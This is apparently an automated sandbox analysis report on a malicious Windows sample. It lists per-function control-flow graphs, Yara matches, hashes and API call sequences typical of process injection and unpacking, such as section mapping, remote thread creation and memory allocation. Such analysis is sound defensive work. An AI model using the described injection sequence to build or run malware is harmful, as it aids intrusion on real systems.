                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                        • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                        • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                        • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64
                                                                                                        Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 399 403103-403127 400 403246-40324b 399->400 401 40312d-403145 399->401 401->400 402 40314b-40315c 401->402 403 40315e-403167 402->403 404 40316c-40317a 403->404 404->404 405 40317c-403183 404->405 406 4031a5-4031ac 405->406 407 403185-4031a4 405->407 408 4031ce-4031d1 406->408 409 4031ae-4031cd 406->409 407->406 410 4031d3-4031d6 408->410 411 4031da 408->411 409->408 410->411 412 4031d8 410->412 411->403 413 4031dc-4031e1 411->413 412->413 413->400 414 4031e3-4031e6 413->414 414->400 415 4031e8-403243 RtlCreateUserThread NtTerminateProcess 414->415 415->400
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                        • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                        • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5
                                                                                                        Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83nativethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 417 403257-40325f 418 4031f0-403243 RtlCreateUserThread NtTerminateProcess 417->418 419 403261-40327f 417->419 420 403246-40324b 418->420 425 403281 419->425 426 403286-403290 419->426 425->426 427 403283-403285 425->427 428 403292 426->428 429 403298-4032ba call 4012ec 426->429 427->426 428->429 430 403293-403297 428->430 435 4032be 429->435 435->435
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                        • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                        • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                        • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
                                                                                                        Function 005F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 5f003c-5f0047 1 5f004c-5f0263 call 5f0a3f call 5f0e0f call 5f0d90 VirtualAlloc 0->1 2 5f0049 0->2 17 5f028b-5f0292 1->17 18 5f0265-5f0289 call 5f0a69 1->18 2->1 20 5f02a1-5f02b0 17->20 22 5f02ce-5f03c2 VirtualProtect call 5f0cce call 5f0ce7 18->22 20->22 23 5f02b2-5f02cc 20->23 29 5f03d1-5f03e0 22->29 23->20 30 5f0439-5f04b8 VirtualFree 29->30 31 5f03e2-5f0437 call 5f0ce7 29->31 33 5f04be-5f04cd 30->33 34 5f05f4-5f05fe 30->34 31->29 36 5f04d3-5f04dd 33->36 37 5f077f-5f0789 34->37 38 5f0604-5f060d 34->38 36->34 40 5f04e3-5f0505 36->40 41 5f078b-5f07a3 37->41 42 5f07a6-5f07b0 37->42 38->37 43 5f0613-5f0637 38->43 52 5f0517-5f0520 40->52 53 5f0507-5f0515 40->53 41->42 44 5f086e-5f08be LoadLibraryA 42->44 45 5f07b6-5f07cb 42->45 46 5f063e-5f0648 43->46 51 5f08c7-5f08f9 44->51 49 5f07d2-5f07d5 45->49 46->37 47 5f064e-5f065a 46->47 47->37 50 5f0660-5f066a 47->50 54 5f07d7-5f07e0 49->54 55 5f0824-5f0833 49->55 58 5f067a-5f0689 50->58 60 5f08fb-5f0901 51->60 61 5f0902-5f091d 51->61 62 5f0526-5f0547 52->62 53->62 56 5f07e4-5f0822 54->56 57 5f07e2 54->57 59 5f0839-5f083c 55->59 56->49 57->55 64 5f068f-5f06b2 58->64 65 5f0750-5f077a 58->65 59->44 66 5f083e-5f0847 59->66 60->61 63 5f054d-5f0550 62->63 67 5f0556-5f056b 63->67 68 5f05e0-5f05ef 63->68 69 5f06ef-5f06fc 64->69 70 5f06b4-5f06ed 64->70 65->46 71 5f084b-5f086c 66->71 72 5f0849 66->72 74 5f056f-5f057a 67->74 75 5f056d 67->75 68->36 76 5f06fe-5f0748 69->76 77 5f074b 69->77 70->69 71->59 72->44 78 5f057c-5f0599 74->78 79 5f059b-5f05bb 74->79 75->68 76->77 77->58 84 5f05bd-5f05db 78->84 79->84 84->63
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5f0000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14
                                                                                                        Function 0076EFFD Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 436 76effd-76f016 437 76f018-76f01a 436->437 438 76f021-76f02d CreateToolhelp32Snapshot 437->438 439 76f01c 437->439 440 76f02f-76f035 438->440 441 76f03d-76f04a Module32First 438->441 439->438 440->441 447 76f037-76f03b 440->447 442 76f053-76f05b 441->442 443 76f04c-76f04d call 76ecbc 441->443 448 76f052 443->448 447->437 447->441 448->442
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0076F025
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0076F045
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_75d000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 3b0da6448144e833350baf14c0413bfa9b44beff34f66378e02ec7a964e876ab
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 68F096361007156BD7203BF5FD8DB6E76E9AF49764F100538FA43910C1DB74EC464661
                                                                                                        Function 005F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 449 5f0e0f-5f0e24 SetErrorMode * 2 450 5f0e2b-5f0e2c 449->450 451 5f0e26 449->451 451->450
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5f0000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5
                                                                                                        Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 452 4019c0-4019c6 453 4019e7-401a10 452->453 454 4019c8-4019dd call 40127e 452->454 462 401a13-401a46 call 40127e Sleep call 4014fb 453->462 463 401a09-401a0c 453->463 471 401a55-401a5b 462->471 472 401a48-401a50 call 4015fb 462->472 463->462 475 401a60-401a65 471->475 476 401a69 471->476 472->471 477 401a6c-401a9a call 40127e 475->477 476->475 476->477
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3472027048-0
                                                                                                        • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                        • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                        • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                        • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                        Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 486 4019e0-401a10 492 401a13-401a46 call 40127e Sleep call 4014fb 486->492 493 401a09-401a0c 486->493 501 401a55-401a5b 492->501 502 401a48-401a50 call 4015fb 492->502 493->492 505 401a60-401a65 501->505 506 401a69 501->506 502->501 507 401a6c-401a9a call 40127e 505->507 506->505 506->507
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                        • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                        • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                        • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                        Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 516 4019eb-401a10 520 401a13-401a46 call 40127e Sleep call 4014fb 516->520 521 401a09-401a0c 516->521 529 401a55-401a5b 520->529 530 401a48-401a50 call 4015fb 520->530 521->520 533 401a60-401a65 529->533 534 401a69 529->534 530->529 535 401a6c-401a9a call 40127e 533->535 534->533 534->535
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                        • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                        • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                        • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                        Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 544 401a04-401a46 call 40127e Sleep call 4014fb 553 401a55-401a5b 544->553 554 401a48-401a50 call 4015fb 544->554 557 401a60-401a65 553->557 558 401a69 553->558 554->553 559 401a6c-401a9a call 40127e 557->559 558->557 558->559
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                        • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                        • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                        • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                        Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                        • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                        • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                        • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                        Function 0076ECBC Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076ED0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_75d000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: 80aa69571d4a516885e739d5ad535428cc02fec2ef88312d5ba01738a350d2bd
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 89113C79A00208EFDB01DF98C985E99BBF5AF08750F198094F9489B362D375EA90DF90
                                                                                                        Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                        • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                        • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                        • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                        Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                        • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                        • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                        • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

                                                                                                        Non-executed Functions

                                                                                                        Function 00401E65 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                        • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                                                        • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                        • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:14.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:50
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 839 74e674 840 74e685 839->840 841 74ee25 2 API calls 840->841 842 74e69d 841->842 806 74e685 807 74e694 806->807 810 74ee25 807->810 812 74ee40 Module32First 810->812 813 74ee74 812->813 814 74e69d 812->814 816 74eae4 813->816 817 74eb0f 816->817 818 74eb20 VirtualAlloc 817->818 819 74eb58 817->819 818->819 819->819 843 700001 844 700005 843->844 849 70092b GetPEB 844->849 846 700030 851 70003c 846->851 850 700972 849->850 850->846 852 700049 851->852 853 700e0f 2 API calls 852->853 854 700223 853->854 855 700d90 GetPEB 854->855 856 700238 VirtualAlloc 855->856 857 700265 856->857 858 7002ce VirtualProtect 857->858 860 70030b 858->860 859 700439 VirtualFree 863 7004be LoadLibraryA 859->863 860->859 862 7008c7 863->862 864 700005 865 70092b GetPEB 864->865 866 700030 865->866 867 70003c 7 API calls 866->867 868 700038 867->868 820 70003c 821 700049 820->821 833 700e0f SetErrorMode SetErrorMode 821->833 826 700265 827 7002ce VirtualProtect 826->827 829 70030b 827->829 828 700439 VirtualFree 832 7004be LoadLibraryA 828->832 829->828 831 7008c7 832->831 834 700223 833->834 835 700d90 834->835 836 700dad 835->836 837 700dbb GetPEB 836->837 838 700238 VirtualAlloc 836->838 837->838 838->826

                                                                                                        Executed Functions

                                                                                                        Function 0070003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 70003c-700047 1 700049 0->1 2 70004c-700263 call 700a3f call 700e0f call 700d90 VirtualAlloc 0->2 1->2 17 700265-700289 call 700a69 2->17 18 70028b-700292 2->18 22 7002ce-7003c2 VirtualProtect call 700cce call 700ce7 17->22 19 7002a1-7002b0 18->19 21 7002b2-7002cc 19->21 19->22 21->19 29 7003d1-7003e0 22->29 30 7003e2-700437 call 700ce7 29->30 31 700439-7004b8 VirtualFree 29->31 30->29 33 7005f4-7005fe 31->33 34 7004be-7004cd 31->34 35 700604-70060d 33->35 36 70077f-700789 33->36 38 7004d3-7004dd 34->38 35->36 42 700613-700637 35->42 40 7007a6-7007b0 36->40 41 70078b-7007a3 36->41 38->33 39 7004e3-700505 38->39 51 700517-700520 39->51 52 700507-700515 39->52 44 7007b6-7007cb 40->44 45 70086e-7008be LoadLibraryA 40->45 41->40 46 70063e-700648 42->46 48 7007d2-7007d5 44->48 50 7008c7-7008f9 45->50 46->36 49 70064e-70065a 46->49 53 700824-700833 48->53 54 7007d7-7007e0 48->54 49->36 55 700660-70066a 49->55 56 700902-70091d 50->56 57 7008fb-700901 50->57 58 700526-700547 51->58 52->58 62 700839-70083c 53->62 59 7007e2 54->59 60 7007e4-700822 54->60 61 70067a-700689 55->61 57->56 63 70054d-700550 58->63 59->53 60->48 64 700750-70077a 61->64 65 70068f-7006b2 61->65 62->45 66 70083e-700847 62->66 68 7005e0-7005ef 63->68 69 700556-70056b 63->69 64->46 70 7006b4-7006ed 65->70 71 7006ef-7006fc 65->71 72 700849 66->72 73 70084b-70086c 66->73 68->38 74 70056d 69->74 75 70056f-70057a 69->75 70->71 76 70074b 71->76 77 7006fe-700748 71->77 72->45 73->62 74->68 78 70059b-7005bb 75->78 79 70057c-700599 75->79 76->61 77->76 84 7005bd-7005db 78->84 79->84 84->63
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0070024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_700000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
